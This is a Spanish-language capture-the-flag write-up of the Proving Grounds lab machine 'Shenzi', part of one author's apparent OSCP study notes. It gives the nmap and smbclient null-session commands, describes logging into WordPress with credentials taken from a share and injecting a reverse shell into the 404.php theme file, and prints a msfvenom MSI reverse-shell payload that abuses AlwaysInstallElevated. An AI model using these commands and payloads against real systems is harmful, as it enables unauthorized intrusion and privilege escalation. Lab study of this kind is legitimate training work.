1gnotus
  • WHOAMI
    • Mi camino a la OSCP😘
    • Mi primer Certificación la eJPT
  • HACK THE BOX
    • Page 1
    • Page 2
  • 💻Proving Ground Practice and Play
    • Writeup
      • MAQUINA JORDAK (Web RCE jordani 1.0.0 + PRIVESC 'env')
      • MAQUINA ALGERNON (VULn 'smartermail v6985 RCE')
      • MAQUINA TWIGGY (CMS MEZZANINA RCE VULN ZEROMQ ZMTP o API SALTSTACK 3000.1 'cve 2020 11651')
      • MAQUINA BOOLEAN (Modificacion de REQUEST con Burpsuite ' confirmed = true ' + LFI + UPLOAD ID_RSA an
      • MAQUINA AUTHBYT (FTP anonymous y credenciales por defecto + subida de archvio PHP revershell a FTP
      • MAQUINA CLAMV (VULN SMTP 25 'clamv' Sendmail 8.13 SEARCHSPLOIT)
      • MAQUINA COCKPIT (Gobuster extension php + Blaze CMS 'SQLI BYPASS LOGIN' + UBUNTU WEB + REVERSHELL +
      • MAQUINA CODO (CODOFORUM 5.1 'RCE + UPLOAD IMG.' + LINPEAS)
      • MAQUINA CVE-2023-40582 (Vulnerabilidad de Inyección de Comando en find exec)
      • MAQUINA CVE-2023-46818 (RCE CVE 2023 46818 ispconfig.)
      • MAQUINA DC 2 (Enum Users Wordpress WPSCAN + CEWL wordlists + BruteForce WPSCAN + PRIVESC bin git 'je
      • MAQUINA DETECTION (WEB 'changedetection' port 5000 + VULN RCE 'changedetection RCE')
      • MAQUINA ELECTION1 (Sito web Election 2.0 + PHPmyadmin login + Escalate Priv SERV U)
      • MAQUINA DVR4 (web 'Argus Surveillance DVR version 4.0.0.0' + Vuln 'Argus Surveillance DVR DIRECTORY
      • MAQUINA EXFILTRED Subrion CMS v4.2.1 File Upload Bypass to RCE (Authenticated) UPLOAD PHAR 'CMD' PRI
      • MAQUINA FAIL (ENUM RSYNC 'PUERTO 873' + SSH- KEYGEN + PREVISEC 'GROUP FAIL2BAIN')
      • MAQUINA FANTASTIC (GRAFANA 8.3 'vuln lfi' + PROMETHEUS 2.32 + ESCALATE PRIV 'group DISK = root + ID_
      • MAQUINA FUNYBOX (CSE BOOKSTORE 1.0 Vuln rce no autenticado PRIVESC pkexec 'sudo l' extra bypass login SMALL CRM ADMIN 3.0)
      • MAQUINA INTERNAL (WINDOWS SERVER 2008 + CVE 2009 3103 + METERPRETER RCE)
      • MAQUINA HUB ( Enum web port 8082 + FUGUHUB + injeccion revershell en LUA)
      • MAQUINA KEVIN (VULN HP POWER MANAGER 'admin admin' Metasploit PrivEsc 'hp manager filename' Metasploit BufferOverflow 'MANUAL')
      • MAQUINA LEVRAM (Exploit GERAPY 0.9.6 RCE searchsploit + PRIVESC 'CAPABILITES python3.10')
      • MAQUINA MEDJED (WEBDAV BarracudaDrive 6.5 + Revershell .php creado con msfvenom + PrivEsc local barracudadrive 6.5)
      • MAQUINA NUKEM (WORDPRESS 5.5.1 ABUSED PLUGINS SIMPLE LIST 4.4.2 PIVOTING USER MYSQL PASSOWORD PIVOTING PUERTO Y TUNELIZACION SSH PRIVESC 'DOSBOX' CAMBIO DE PERMISOS SUDOERS CON REMMINA)
      • MAQUINA PASS (FlatPass 1.2 Vuln 'file upload bypass RCE' Privesc 'apt get')
      • MAQUINA PELICAN (RCE ZooKeeper v1 Web UI + RCE + PrivEsc 'gcore pid + extract password 'strings' = root)
      • MAQUINA RAY PROJECT CVE 2023 6019 (COMMANDO INJECTION RAY PROJECT)
      • MAQUINA SHENZI (Enum SMB 'nullsesion' + Directory Web = Nombre del recurso compartido + WORDPRESS RC
      • MAQUINA BRATARINA (SMB null session + RCE 'OPENSMTPD 2.0.0') + (MODIFICACION passwd 'agregar password' + Subscribir archivo etc passwd)
      • MAQUINA SQUID (web proxy SQUID 4.14 + 'RCE UPLOAD script' PHPMYADMIN 5.0.2)
      • MAQUINA PC (PortForwarding port 65432 - PrivEsc 0-day 2022 rpc.py)
      • MAQUINA FUNBOXEASY (Enum directory - RCE .php - Pivoting User - PrivEsc SUDO-L)
      • MAQUINA SLORT (Enum de directorios Acceso a la maquina con LFI and RCI PrivEsc Auto Elevated Executable Hijacking)
      • MAQUINA PASSPORT (Enum Directorios ss2john id rsa PrivEsc Creacion de archivo con permisos SUID)
      • MAQUINA PYLOADER (pyload 0.5.0 Rce No autenticado)
      • MAQUINA HUTCH (Netexec LDAP enum - PrivEsc Netexec DUMP Laps)
      • MAQUINA GAARA (Brute Force SSH PrivEsc 'gdb' gtfobins)
  • 🥸CHEET-SEET
    • CheetSeet WPSCAN
  • 🐋DOCKERLABS
    • Writeup
      • MAQUINA WALKINGCMS
      • MAQUINA PN (EXPLOIT UPLOAD .WAR TOMCAT - RCE 'MSFVENOM')
  • 👺Road-to-BSCP
    • Page 4
  • 🖥️THEHACKLABS
    • Writeups
      • MAQUINA TORRIJAS(CMS WORDPRESS 6.7.2, WPSCAN PLUGINS 'WP DIRECTORY FREE 1.7.9 LocalFileInclusion PRIVESC bpftrace)
      • MAQUINA FACULTAD (Enum WPSCAN - wordpress UPLOAD RCE WP-FILE-MANAGER - PrivEsc SUDO -L RCE)
Powered by GitBook
On this page
  1. Proving Ground Practice and Play
  2. Writeup

MAQUINA SHENZI (Enum SMB 'nullsesion' + Directory Web = Nombre del recurso compartido + WORDPRESS RC

PreviousMAQUINA RAY PROJECT CVE 2023 6019 (COMMANDO INJECTION RAY PROJECT)NextMAQUINA BRATARINA (SMB null session + RCE 'OPENSMTPD 2.0.0') + (MODIFICACION passwd 'agregar password' + Subscribir archivo etc passwd)

Last updated 1 month ago

Enumere los puertos de la maquina.

nmap -p- --open -sS --min-rate 3000 -n -vvv -Pn 192.168.104.55 -oG Basicscan.txt

Puertos abiertos:

21,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669

Realice una enumeración de los servicios y sus versiones.

nmap -p21,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669 -sCV

Busque si estos servicios contienen alguna vulnerabilidad utilizando scripts de nmap, pero no contenían ninguna vuln.

nmap -p21,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669 --sc

Utilice la herramienta nxc para verificar ante que windows me enfrento.

nxc smb 192.168.104.55

Con smbclient utilizando el parámetro -N para que me conecte a través de una null sesión y luego el parámetro -L para que liste los recursos compartidos del servicio SMB.

smbclient -N -L 192.168.104.55

Dentro de los recurso encontre una carpeta con nombre "Shenzi".

Con el siguiente comando a través de la null sesión accedí al servicio SMB.

smbclient -N \\192.168.104.55\\shenzi

Ya dentro de la carpeta, descargo el contenido con el comando "get"

Explore el archivo password el cual observe que contiene varias credenciales, la interesante es la del wordpress.

Ingrese al servicio web que corre tanto en el puerto 80 http como el en servicio web 443 http. En el puerto 80 encontré una web sobre XAMPP.

Con wappalizer observe las tecnlogias que corren en el sitio web.

Encontré un apartado donde puedo observar el phpinfo.

Realice una búsqueda de directorios pero no encontré nada interesante.

Coloque el nombre del archivo compartido "shenzi" como directorio y me llevo a un wordpress.

En el puerto 80 al dirigirme al panel de sesión me devuelve un error por lo que realice lo mismo pero en el puerto 443 https.

Logre acceder al panel de sesión, seguido coloque las credenciales encontradas aquí y me adentre al panel como administrador.

Para realizar una revershell modifique el contenido del error 404.php editando los temas.

Una vez que agregue mi revershell maliciosa actualice la web seguidamente en mi kali coloque me puse en escucha con netcat.

rlwrap nc -nlvp 80 # mi kali

Ya listo en la URL me dirijo al apartado 404.php donde esta mi revershell

Esto va a devuelve la conexión a mi maquina kali.

Ya dentro de la maquina windows, me cree un carpeta de trabajo llamada /tmp, ahora subi el ejecutable winpeas y luego lo ejecuto.

Terminado de realizar el reconocimiento observe que tengo el permiso AlwaysInstallElevated.

Cuando la configuración AlwaysInstallElevated se establece en 1 en ambos el HKLM (HKEY_LOCAL_MACHINE) y HKCU (HKEY_CURRENT_USER) claves de registro, indica que los paquetes de instalación se están instalando con privilegios elevados

Para abusar de esto y poder escalar privilegios lo que realice fue crear un ejecutable con msfvenom.

msfvenom -p windows/x64/shell_reverse_rcp LHOST=192.168.45.233 LPORT=1234 -f msi > r

La extensión MSI:

Un archivo MSI es un archivo de instalación de Microsoft Windows Installer. Este tipo de archivo se utiliza para instalar, actualizar y desinstalar software en sistemas operativos Windows.

Luego subí el binario de netcat x64 como la revershell.msi

Ya teniendo estos 2 archivos me conecte en mi kali por el puerto donde cree la revershell.msi "1234" y seguido a eso ejecute la revershell.msi en la maquina windows.

💻
http://192.168.104.55/dashboard
https://192.168.104.55/404.php